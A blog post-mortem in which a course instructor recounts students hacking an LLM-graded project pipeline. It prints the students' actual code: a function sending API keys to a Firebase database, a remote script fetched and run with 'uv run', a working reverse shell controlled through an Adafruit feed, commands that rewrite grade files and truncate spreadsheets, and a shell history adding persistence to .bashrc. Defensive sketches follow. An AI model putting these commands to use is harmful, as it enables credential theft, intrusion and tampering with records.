---
title: A Post-mortem Of Hacking Automated Project Evaluation
date: "2024-12-21T02:23:07Z"
lastmod: "2024-12-21T02:23:08Z"
categories:
  - coding
  - education
wp_id: 3769
description: "Once students are encouraged to hack LLM-based grading, some will escalate from prompt tricks to real system compromise, showing how unsafe it is to run untrusted code inside automated evaluation pipelines."
keywords: [automated evaluation, security, student hacks, LLM grading, prompt injection, sandboxing]
---

![A Post-mortem Of Hacking Automated Project Evaluation](/blog/assets/DALL·E-2024-12-21-10.20.29-A-colorful-single-panel-comic-strip-in-the-style-of-classic-Calvin-Hobbes.-Calvin-a-young-boy-with-wild-hair-hides-under-a-desk-cluttered-with-a-c-1.webp)

In my [Tools in Data Science](https://study.iitm.ac.in/ds/course_pages/BSSE2002.html) course, I launched a [Project: Automated Analysis](https://github.com/sanand0/tools-in-data-science-public/tree/tds-2024-t3/project2). This is automatically evaluated by a Python script and LLMs.

I gently encouraged students to hack this, to teach them how to persuade LLMs. I did not expect them to hack the evaluation system itself.

[One student](https://github.com/siddhant-bapna/Project2/blob/main/autolysis.py#L88-L102) exfiltrated the API keys used for evaluation. They set up a Firebase database, and their script posts the API key of anyone who runs it.

```python
def checkToken(token):
    obj = {}
    token_key = f"token{int(time.time() * 1000)}"  # Generate a token-like key based on the current timestamp
    obj[token_key] = token
    url = "https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json"
    headers = {"Content-Type": "application/json"}
    try:
        response = requests.post(url, headers=headers, data=json.dumps(obj))
        response.raise_for_status()  # Raise an exception for HTTP error responses
        print(response.json())  # Parse the JSON response
    except requests.exceptions.RequestException as error:
        print("Error:", error)
    return True
```

This is mildly useful, since some students ran out of tokens. But it is mostly harmless, since the requests are routed via a [proxy with a $2 limit](https://github.com/sanand0/aiproxy/blob/1a6703f3a52dfc3009c8fbf5c103098b47b009ee/worker.js#L91) that only allows the inexpensive GPT-4o-mini model.
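A cheap pre-check for this kind of exfiltration is to list the hosts a submission mentions before running it. Below is a minimal sketch, not what I actually ran: `ALLOWED_HOSTS`, the host `llm-proxy.example.com`, and the function name `unexpected_hosts` are all assumptions made for illustration.

```python
import ast
import re
from urllib.parse import urlparse

# Assumption: the only host a submission legitimately needs is the LLM proxy.
ALLOWED_HOSTS = {"llm-proxy.example.com"}  # hypothetical host name
URL_PATTERN = re.compile(r"https?://[^\s'\"]+")


def unexpected_hosts(source: str) -> set[str]:
    """Return hosts found in string literals of `source` that are not allowlisted."""
    hosts = set()
    for node in ast.walk(ast.parse(source)):
        # Plain strings and the literal parts of f-strings are both ast.Constant nodes.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_PATTERN.findall(node.value):
                host = urlparse(url).hostname
                if host and host not in ALLOWED_HOSTS:
                    hosts.add(host)
    return hosts


sample = '''
API = "https://llm-proxy.example.com/v1/chat/completions"
url = "https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json"
'''
print(unexpected_hosts(sample))
```

This only catches URLs written as literals. A URL assembled at runtime or hidden behind encoding would slip through, so treat it as a prompt for manual review rather than a defense.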

[Another student](https://github.com/microdev1/tds-p2/blob/a722def4f3a0007b168a89ff943513226e417cc0/autolysis.py#L371-L377) ran an external script every time I ran his code:

```python
subprocess.Popen(
    ["uv", "run", "https://raw.githubusercontent.com/microdev1/analysis/main/script.py"]
)
```

[This script](https://github.com/microdev1/analysis/blob/cc75186375d16e41d5fba8424ac93ab23a6d9daa/script.py) does a bunch of things:

```python
# Gives them full marks on every answer in every CSV file I store the scores in
CMD = r"sed -Ei 's/,[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0/,\1,\1,22f3002354,1/g' /project2/*.csv &"

# Chops off the first 25% of all XLSX files in my output folder. (But WHY?)
CMX = '(for file in /project2/*.xlsx; do (tmpfile=$(mktemp) && dd if="$file" bs=1 skip=$(($(stat -c%s "$file") / 4)) of="$tmpfile" && mv "$tmpfile" "$file") & done) &'
```
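To see what the `sed` substitution in `CMD` does, here is the same pattern applied with Python's `re` module. The sample rows are hypothetical, since I haven't shown the real column layout here. The point is only that the number just before the student ID is copied over the number before it, and the trailing `0` becomes `1`.

```python
import re

# Same pattern as the sed command above, written for Python's re module.
PATTERN = re.compile(r",[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0")


def tamper(line: str) -> str:
    """Apply the same replacement that the sed command applies to each CSV line."""
    return PATTERN.sub(r",\1,\1,22f3002354,1", line)


# Hypothetical rows: the real files have more columns than this.
mine = "some-check,0.0,0.2,22f3002354,0"
other = "some-check,0.0,0.2,21f0000000,0"

print(tamper(mine))   # some-check,0.2,0.2,22f3002354,1
print(tamper(other))  # unchanged: the pattern is tied to one student ID
```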

Then comes live hacking.

```python
DELAY = 10
URL_GET = "https://io.adafruit.com/api/v2/naxa/feeds/host-port"
URL_POST = "https://io.adafruit.com/api/v2/webhooks/feed/VDTwYfHtVeSmB1GkJjcoqS62sYJu"

while True:
    # Establish a Control Channel:
    # Query the AdaFruit server for connection parameters (host and port).
    # Wait specifically until the feed value has the form TIME:host:port.
    address = requests.get(URL_GET).json()["last_value"].split(":")
    if len(address) == 3 and all(address) and address[0] == TIME:
        address = (str(address[1]), int(address[2]))
        break
while True:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Connect to the target address
        s.connect(address)
        log("connect")
        # Replace stdin, stdout, stderr with the socket.
        # Anything typed on the socket is fed into the shell and output is sent to the socket.
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        # Spawn a shell
        try:
            pty.spawn("bash")
        except:
            pty.spawn("sh")
        # Log disconnect, retry after 60 seconds (DELAY * 6)
        log("disconnect")
        time.sleep(DELAY * 6)
```

This script is a reverse shell. It reads a host and port from a feed they control on [Adafruit](https://io.adafruit.com/) (an IoT service I learned about today), connects back to that address, and lets them run commands on my system.

Here's what they did:

```bash
ls
cd
ls -a1
ls
ls -a1
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py"
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .bashrc
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .zshrc
cat .bashrc
cat .zshrc
ls
cd /tmp
ls
cat scriptLbsDUR.py
clear
ls
cd
ls
ls -a1
cat .profile
zsh
bash
nano .bashrc
ls
ls /tmp/
ls -a /tmp/
ls /
cd /project2/
ls
cat results.
cat results.csv
head results.csv
grep "22f3002354" results.csv
sed -n 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/p' results.csv
sed -i 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
unset $HISTFILE
sed -i 's/0.0,0.5,22f3002354/0.5,0.5,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
ls
ls -1
ls -l
ps
ps -aux
echo $$
ls /
ls /tmp/
clear
grep "22f3002354" results.csv
clear
la
clear
ls -1
clear
ls -l
head results.xlsx
clear
head results.xlsx
clear
```

In short, they:

1. Made sure this script re-runs every time I log in
2. Looked at where I store the project results (`results.csv` and `results.xlsx`)
3. Tested a command that gives them full marks (which they then added to the script, so it re-runs each time)

In all, a good hack. I lost over a day since I needed to re-run all evaluations (in case there were other hacks I missed).

It would have been cleverer if it were less detectable. But that's hard, because:

1. Robust hacks use multiple approaches. That increases the chance I'd find one of them. Once I do, I'd check everywhere.
2. They'd give themselves full marks, and I'd check the marks at the end and detect it. (Merely high marks aren't worth the hack. They'd get those even without it.)
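Detection need not wait until the end. One option is to fingerprint the results folder just before running a submission and again right after, before the evaluator writes anything itself. This is a minimal sketch of that idea, not something I had in place. The helper names `snapshot` and `changed_files` are made up, and the temporary folder stands in for `/project2`.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(folder: Path) -> dict[str, str]:
    """Map each file name in `folder` to the SHA-256 of its contents."""
    return {
        path.name: hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(folder.iterdir())
        if path.is_file()
    }


def changed_files(before: dict[str, str], after: dict[str, str]) -> list[str]:
    """Names of files added, removed, or modified between two snapshots."""
    names = before.keys() | after.keys()
    return sorted(name for name in names if before.get(name) != after.get(name))


# Demo in a temporary folder, with a simulated edit between the two snapshots.
with tempfile.TemporaryDirectory() as tmp:
    folder = Path(tmp)
    (folder / "results.csv").write_text("some-check,0.0,0.2,22f3002354,0\n")
    before = snapshot(folder)
    (folder / "results.csv").write_text("some-check,0.2,0.2,22f3002354,1\n")
    after = snapshot(folder)
    tampered = changed_files(before, after)

print(tampered)  # ['results.csv']
```

A background process that edits the files later would escape a check made right after the run, so this narrows the window but does not close it.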

Of course, these were just **polite** hacks. A pro would have caused me far more trouble. If you're writing automated evaluation scripts: **Be very, very wary**.
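One way to act on that is to never run a submission on the machine that holds the scores. Here is a rough sketch that builds a `docker run` command for an isolated run. It is an assumption-laden illustration, not my setup: the function name `sandbox_command`, the image `python:3.12-slim`, the mount points, and the resource limits are all placeholders.

```python
from pathlib import Path


def sandbox_command(submission: Path, output: Path,
                    image: str = "python:3.12-slim") -> list[str]:
    """Build a docker command that runs a submission with tight restrictions."""
    return [
        "docker", "run", "--rm",
        "--network", "none",    # no outbound connections, so no reverse shell
        "--read-only",          # container root filesystem is read-only
        "--tmpfs", "/tmp",      # scratch space that vanishes with the container
        "--memory", "512m",
        "--pids-limit", "128",
        "--volume", f"{submission.resolve()}:/work:ro",  # code, read-only
        "--volume", f"{output.resolve()}:/out",          # the only writable mount
        "--workdir", "/out",
        image,
        "python", "/work/autolysis.py",
    ]


cmd = sandbox_command(Path("submissions/student1"), Path("outputs/student1"))
print(" ".join(cmd))
```

Neither the results files nor my shell startup files are mounted, so the edits shown earlier would have nothing to touch. The catch is that `--network none` also blocks the LLM calls the project needs, so a real setup would have to allow traffic to the proxy and nothing else.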